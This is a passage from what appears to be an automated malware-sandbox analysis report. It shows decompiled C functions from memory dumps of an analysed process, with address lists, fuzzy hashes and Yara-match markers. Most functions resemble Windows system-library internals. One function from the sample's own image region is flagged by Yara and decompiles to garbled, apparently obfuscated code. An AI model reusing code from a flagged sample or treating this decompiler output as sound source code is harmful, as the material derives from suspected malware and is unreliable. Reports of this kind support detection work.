					E01002280(_t6, 0x10d8550);
				}
				_t29 = E0102387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E00FFFFB0(0x10d8550, _t27, 0x10d8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x010237fa
0x010237fc
0x01023805
0x01023808
0x01023808
0x01023814
0x01023818
0x01023846
0x01023848
0x0102384b
0x0102384b
0x01023852
0x00000000
0x01023854
0x01023856
0x00000000
0x00000000
0x01023863
0x00000000
0x01023863
0x0102381a
0x0102381a
0x0102381f
0x0102386e
0x0102386e
0x01023871
0x01023873
0x01023873
0x01023868
0x00000000
0x01023868
0x01023821
0x01023826
0x00000000
0x00000000
0x01023828
0x0102382a
0x01023841
0x00000000
0x01023841

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f782a68505707ade828aab232a2ed573a5dd301a9ee81b6942abb9478b647d8a
Instruction ID: 1517e3a5a4ba2b110ee656843ac9a92ef1a370abc1327551ad7fee3bb94f05ae
Opcode Fuzzy Hash: f782a68505707ade828aab232a2ed573a5dd301a9ee81b6942abb9478b647d8a
Instruction Fuzzy Hash: 8401DB729017315BC3378B1DD940E26BBEAFF89B5071540A9E9C58F315D778D801CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0101002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01007D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01007D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01007D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01007D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x01010032
0x01010037
0x01010043
0x01054b3a
0x01010049
0x01010049
0x01010049
0x0101004e
0x01010053
0x01054b48
0x01054b5a
0x01054b4a
0x01054b53
0x01054b53
0x01054b5f
0x00000000
0x01054b61
0x00000000
0x01054b61
0x01010059
0x01010059
0x01010060
0x01054b6f
0x01054b6f
0x01010069
0x01054b83
0x00000000
0x00000000
0x01054b90
0x01054b9b
0x01054b9b
0x01054ba4
0x00000000
0x00000000
0x01054baa
0x00000000
0x0101006f
0x0101006f
0x00000000
0x0101006f
0x01010069

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: ec75ab11c39129b821572bb9ba80b66d24e156040d19ef970374858e9efe20dc
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 8F118E72605A818FF7A39B28C944BAA7BE5AB41754F0900E1EEC4C7696E72DD8C1C660

Uniqueness

Uniqueness Score: -1.00%

Function 00FF766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FF766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0101F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0101F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01004620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x00ff7672
0x00ff767f
0x00ff7689
0x00ff76de
0x00ff76de
0x00ff768b
0x00ff7691
0x00ff7693
0x00ff7697
0x00000000
0x00ff7699
0x00ff76a8
0x00000000
0x00ff76aa
0x00ff76ad
0x00ff76b1
0x00000000
0x00ff76b3
0x00ff76b3
0x00ff76b5
0x00ff76ba
0x00ff76bc
0x00ff76bc
0x00ff76c0
0x00000000
0x00ff76c2
0x00ff76ce
0x00ff76ce
0x00ff76c0
0x00ff76b1
0x00ff76a8
0x00ff7697
0x00ff76d9

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 5ad8798f595310c11eb14850abc2978414a45890d09bdd163c96264b82e9eee5
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 44018D3270461DABC710AE5DCD41E67B7ADEF84760F144534BA04CB2A4EA30DD0197A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00FE9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x10d85ec;
				E01002280(_t48, 0x10d85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E00FFFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x10d538c; // 0x77f06828
					if( *_t84 != 0x10d5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x10bf6e8);
						E0103D0E8(0x10d85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E010B88F5(_t80, _t85, 0x10d5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x10d86c0; // 0xb807b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x10d86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01002280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E010B88F5(0x10d85ec, _t85, 0x10d5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0102AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x10db1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x10d84c0;
																			if(_t82 >=  *0x10d84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E010B9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E00FE922A(_t99);
										_t64 = E01007D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E010B8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x10d86c0; // 0xb807b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x10d86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x10d86bc;
													_t87 = 0x10d86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E00FE9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x10d86c4;
												_t87 = 0x10d86c0;
												L27:
												E01019B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0103D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x10d5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x10d538c = _t51;
						goto L6;
					}
				}
			}

0x00fe9082
0x00fe9083
0x00fe9084
0x00fe9085
0x00fe9087
0x00fe9096
0x00fe9098
0x00fe9098
0x00fe909e
0x00fe90a8
0x00fe90e7
0x00fe90e7
0x00fe90aa
0x00fe90b0
0x00fe90b7
0x00fe90bd
0x00fe90dd
0x00fe90e6
0x00fe90bf
0x00fe90bf
0x00fe90c7
0x00fe90cf
0x00fe90f1
0x00fe90f2
0x00fe90f4
0x00fe90f5
0x00fe90f6
0x00fe90f7
0x00fe90f8
0x00fe90f9
0x00fe90fa
0x00fe90fb
0x00fe90fc
0x00fe90fd
0x00fe90fe
0x00fe90ff
0x00fe9100
0x00fe9102
0x00fe9107
0x00fe910c
0x00fe9110
0x00fe9113
0x00fe9115
0x00fe9136
0x00fe913f
0x00fe9143
0x010437e4
0x010437e4
0x00fe9117
0x00fe9117
0x00fe911d
0x00000000
0x00fe911f
0x00fe911f
0x00fe9125
0x00000000
0x00fe9127
0x00fe912d
0x00fe9130
0x00fe9134
0x00fe9158
0x00fe915d
0x00fe9161
0x00fe9168
0x01043715
0x00fe916e
0x00fe916e
0x00fe9175
0x00fe9177
0x00fe917e
0x00fe917f
0x00fe9182
0x00fe9182
0x00fe9187
0x00fe9187
0x00fe918a
0x00fe918d
0x00fe918f
0x00fe9192
0x00fe9195
0x00fe9198
0x00fe9198
0x00fe9198
0x00fe919a
0x00000000
0x00000000
0x0104371f
0x01043721
0x01043727
0x0104372f
0x01043733
0x01043735
0x01043738
0x0104373b
0x0104373d
0x01043740
0x00000000
0x01043746
0x01043746
0x01043749
0x00000000
0x0104374f
0x0104374f
0x01043751
0x01043757
0x01043759
0x0104375c
0x0104375c
0x0104375e
0x0104375e
0x01043761
0x01043764
0x00000000
0x00000000
0x01043766
0x01043768
0x010437a3
0x010437a3
0x010437a5
0x010437a7
0x010437ad
0x010437b0
0x010437b2
0x010437bc
0x010437c2
0x010437c2
0x010437b2
0x00fe9187
0x00fe9187
0x00fe918a
0x00fe918d
0x00fe918f
0x00fe9192
0x00fe9195
0x00000000
0x00fe9195
0x00000000
0x0104376a
0x0104376a
0x0104376a
0x0104376c
0x0104376c
0x0104376f
0x01043775
0x00000000
0x00000000
0x01043777
0x01043779
0x01043782
0x01043787
0x01043789
0x01043790
0x01043790
0x0104378b
0x0104378b
0x0104378b
0x01043792
0x01043795
0x00000000
0x01043795
0x00000000
0x01043779
0x01043798
0x00000000
0x01043798
0x00000000
0x01043768
0x0104379b
0x0104379b
0x01043751
0x01043749
0x00000000
0x01043740
0x00fe91a0
0x00fe91a3
0x00fe91a9
0x00fe91b0
0x00000000
0x00fe91b0
0x00fe9187
0x00fe91b4
0x00fe91b4
0x00fe91bb
0x00fe91c0
0x00fe91c5
0x00fe91c7
0x010437da
0x00fe91cd
0x00fe91cd
0x00fe91cd
0x00fe91d2
0x00fe91d5
0x00fe9239
0x00fe9239
0x00fe91d7
0x00fe91db
0x00fe91e1
0x00fe91e7
0x00fe91fd
0x00fe9203
0x00fe921e
0x00fe9223
0x00000000
0x00fe9205
0x00fe9205
0x00fe9208
0x00fe920c
0x00fe9214
0x00fe9214
0x00fe920c
0x00fe91e9
0x00fe91e9
0x00fe91ee
0x00fe91f3
0x00fe91f3
0x00fe91f3
0x00fe91e7
0x00000000
0x00000000
0x00000000
0x00fe9134
0x00fe9125
0x00fe911d
0x00fe914e
0x00fe90d1
0x00fe90d1
0x00fe90d3
0x00fe90d6
0x00fe90d8
0x00000000
0x00fe90d8
0x00fe90cf

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c4d7ad29b29f8c4416ad427c098e2b978634e35b3e8a5b5f8e0ff1f71cd573f
Instruction ID: 11f9a035b1df06ceb3b46648dc787e47993c685e7f46431f34aa1b7247f9fd95
Opcode Fuzzy Hash: 4c4d7ad29b29f8c4416ad427c098e2b978634e35b3e8a5b5f8e0ff1f71cd573f
Instruction Fuzzy Hash: 090128729053449FC3258F29DC40B117BB9FF81320F618026FA018B7A1C7B5DC41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0107C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0107C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01029910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E010295B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E010295D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E010295D0();
				return L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0107c458
0x0107c45d
0x0107c466
0x0107c468
0x0107c469
0x0107c46a
0x0107c46b
0x0107c46e
0x0107c46f
0x0107c471
0x0107c476
0x0107c476
0x0107c47c
0x0107c47e
0x0107c480
0x0107c480
0x0107c483
0x0107c484
0x0107c486
0x0107c488
0x0107c48f
0x0107c491
0x0107c493
0x0107c493
0x0107c48f
0x0107c498
0x0107c49e
0x0107c4ad
0x0107c4ad
0x0107c4b2
0x0107c4b4
0x0107c4cd

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 74a14b921f5978c9d0f4cf507ea9043f0788ad4492c37878e405e72d4d74293c
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: C1018072240526BFE621AF69CD80EA2BB6DFF64394F004525F294425A0CB31ACA0CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 010B4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E010B4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01002280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01002280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x10d86ac);
					E00FEF900(0x10d86d4, _t28);
					E00FFFFB0(0x10d86ac, _t28, 0x10d86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E00FFFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x010b401a
0x010b401e
0x010b4023
0x010b4028
0x010b4029
0x010b402b
0x010b402f
0x010b4043
0x010b4046
0x010b4051
0x010b4057
0x010b405f
0x010b4062
0x010b4067
0x010b406f
0x010b407c
0x010b407c
0x010b408c
0x010b408c
0x010b4097

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e9816413eff205854edb56c4af83172fde7ba6d69acff35fb4e762d618570a7
Instruction ID: 1bf9d941d4c1b77d055e0936691582e0acfe6ef8554fd50fdcb1c6ffd85ee554
Opcode Fuzzy Hash: 4e9816413eff205854edb56c4af83172fde7ba6d69acff35fb4e762d618570a7
Instruction Fuzzy Hash: 5601A7712016467FD251AB79CD84E67B7ACFF49760B000225F648C7A62CB38EC11C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 010A14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E010A14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x10dd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0102FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01007D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0102B640(E01029AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x010a14fb
0x010a14fb
0x010a150a
0x010a1514
0x010a1519
0x010a151b
0x010a1526
0x010a152c
0x010a1534
0x010a1537
0x010a153a
0x010a1545
0x010a1557
0x010a1547
0x010a1550
0x010a1550
0x010a1562
0x010a1563
0x010a1565
0x010a156a
0x010a157f

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637849de4944d8bbcc7d592230bdb4af20ae2c0bf1ff18d2c3b805d4df55c26
Instruction ID: e556d6b083c8a2ced2b7040706bbf89e6995779dd8c68bea3cda063bac37c1f3
Opcode Fuzzy Hash: d637849de4944d8bbcc7d592230bdb4af20ae2c0bf1ff18d2c3b805d4df55c26
Instruction Fuzzy Hash: 0B01B571A01259EFDB10DFA8D846EEEBBB8EF45710F444066F984EB380DA74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 010A138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E010A138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x10dd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0102FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01007D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0102B640(E01029AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x010a138a
0x010a138a
0x010a1399
0x010a13a3
0x010a13a8
0x010a13aa
0x010a13b5
0x010a13bb
0x010a13c3
0x010a13c6
0x010a13c9
0x010a13d4
0x010a13e6
0x010a13d6
0x010a13df
0x010a13df
0x010a13f1
0x010a13f2
0x010a13f4
0x010a13f9
0x010a140e

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2475f320e127702001bd3242340dec0e5baef603687c6ebd0139ecb0115d6c42
Instruction ID: 2aae695a193f592f62e19699072d6e36b9a62541f0de39ea83267d2085e93d22
Opcode Fuzzy Hash: 2475f320e127702001bd3242340dec0e5baef603687c6ebd0139ecb0115d6c42
Instruction Fuzzy Hash: 58015E71A01219AFDB14EFA9D846EAEBBB8EF44710F404066F944EB280DA74DA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3A2, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040E3A2(void* __eax, void* __ebx, char* __ecx, signed char __edx, void* __edi, void* __esi) {
				intOrPtr _t38;
				signed char _t41;
				void* _t44;
				void* _t48;

				_t48 = __esi;
				_t44 = __edi;
				_t41 = __edx;
				asm("adc al, 0x58");
				_t28 = __ecx;
				_push(0x2d69e234);
				 *((intOrPtr*)(__eax - 0x2b)) =  *((intOrPtr*)(__eax - 0x2b)) - __eax - 0xa8;
				asm("aad 0xb");
				 *((intOrPtr*)(__ecx)) =  *((intOrPtr*)(__ecx)) + __edx;
				_push(ss);
				_t38 =  *((intOrPtr*)(__edi - 0x51));
				_push(ds);
				asm("sahf");
				asm("cdq");
				asm("popfd");
				asm("out dx, eax");
				 *((intOrPtr*)(__ecx - 0x14)) =  *((intOrPtr*)(__ecx - 0x14)) + 1;
				asm("insb");
				asm("aad 0x69");
				if(__ebx -  *((intOrPtr*)(_t38 - 0x6d3b3533)) >= 0) {
					 *__edx =  *__edx + __ecx;
					_push(es);
					_t28 =  *0x7fb6411a;
					 *0xfe5dbdd1 = _t28;
				}
				 *_t28 =  *_t28 - 1;
				 *(_t38 + 0x75) =  *(_t38 + 0x75) & _t41;
			}

0x0040e3a2
0x0040e3a2
0x0040e3a2
0x0040e3a2
0x0040e3a6
0x0040e3a7
0x0040e3ac
0x0040e3af
0x0040e3b1
0x0040e3b3
0x0040e3b4
0x0040e3b7
0x0040e3b8
0x0040e3b9
0x0040e3ba
0x0040e3bd
0x0040e3be
0x0040e3c1
0x0040e3c8
0x0040e3ca
0x0040e3cc
0x0040e3ce
0x0040e3cf
0x0040e3d4
0x0040e3d4
0x0040e3d8
0x0040e3da

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 806c4d212c1612a4a40a0cb965320908f7623ce29ae8bc84667bf48d62883fb7
Instruction ID: b3a92c52287c3bec2eb541c460db733e52da949487e1f53b4aebcd6508260c87
Opcode Fuzzy Hash: 806c4d212c1612a4a40a0cb965320908f7623ce29ae8bc84667bf48d62883fb7
Instruction Fuzzy Hash: D8F078F7A1A3C14FD7128E3194181F5BFB1DB6722930401EEC8809B223D1729402C728

Uniqueness

Uniqueness Score: -1.00%

Function 00FE58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00FE58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x10dd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0xfc5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E00FE5943() != 0 &&  *0x10d5320 > 5) {
					E01067B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01067B5E( &_v28, _t28);
					_t11 = E01067B9C(0x10d5320, 0xfcbf15,  &_v28, _t22, 4,  &_v76);
				}
